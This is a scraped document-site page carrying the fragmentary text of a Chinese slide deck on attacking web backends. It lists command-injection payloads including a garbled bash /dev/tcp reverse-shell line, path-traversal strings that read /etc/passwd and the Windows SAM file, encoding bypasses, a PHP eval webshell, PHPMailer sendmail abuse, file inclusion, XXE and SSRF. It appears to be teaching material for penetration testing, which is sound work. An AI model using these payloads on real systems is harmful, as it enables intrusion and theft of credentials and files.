攻击后端组件.pptx

  1. 1、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
攻击后端组件

攻击后端组件;操作系统:Linux/Windows;Web服务器内置的API与OS直接进行交互 PHP:exec() ASP:wscript.shell() JSP:Runtime.getRuntime().exec() Python: os.system()、popen() 用户可控制输入参数 程序员过滤不严格;字符;字符;基本时间延迟推断 【|| ping -c 30 || ping -n 30 】 输出回显测试 【ls;dir】 反弹shell测试 【bash?-i??/dev/tcp//8080?01】 提权 横向破坏 ;nslookup wget -o sendmail(CVE-2016-10033中,PHPMailer的RCE) -X logfile是记录log文件的,就是可以写文件; -C file是临时加载一个配置文件,就是可以读文件; -O option=value 是临时设置一个邮件存储的临时目录的配置。 ;路径遍历漏洞 /1/2/../../../../../../../etc/passwd /1/2/../../../../../../../windows/win.ini 确定攻击目标 路径 参数:file=../../../../../etc/passwd 文件上传/下载、说明文档、上传图像 基本测试 f=a/b.txt VS f=a/c/../b.txt 根目录测试 ../../../../../../../../../../../../../../../../../../ 有写权限时 基础测试 c:/1.txt c:/windows/system32/config/sam 根目录访问测试 ;绕过净化函数 ../..\ …./\ %2e、%u002e、%252e、%c0%2e 绕过前缀后缀检查函数 Filestore/../../../../../../../../../../etc/passwd ../../boot.ini%00.jpg 绕过定制编码 ../../../../etc/passwd/../../tmp/foo Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZC8uLi8uLi90bXAvZm9v ;可读文件 密码 配置文件 数据库证书 数据库源文件 Xml文件 源代码 日志文件(可能包含用户名/密码/sessionid) 可写文件 创建启动脚本 创建webshell ;Php:eval($_GET[‘passwd’]) Perl:eval() ;测试位置 Cookie名和cookie值 提交payload ;echo%2012345 :response.write%2012345 System(‘ping %20n’) Phpinfo(); ;PHP远程文件包含漏洞 http://a.php?country=US $country=$_GET[‘country’]; include($country . ‘.php’); 测试步骤 有一个远程服务器和URL 用一个不存在的URL测试是否超时 本地文件包含漏洞 测试步骤 静态资源包含测试 ;XXE攻击 !DOCTYPE foo [ ! ENTITY xxe SYSTEM “FILE:///windows/win.ini” ] searchxxe;/search SOAP注入 破坏程序逻辑;SSRF 代理服务器 内网跳板 XSS 测试步骤 查找IP或URL格式的参数 ;;Apache mod_rewrite RewriteRule ^pub/user/ ([^/\.]+)$ /inc/usr.php?mode=viewname=$1 /pub/user/tom - /inc/user.php?mode=viewname=tom /pub/user/tom%26mode=edit ;Thanks!;Shell解析脚本的过程;注入电子邮件

文档评论(0)

wyjy + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档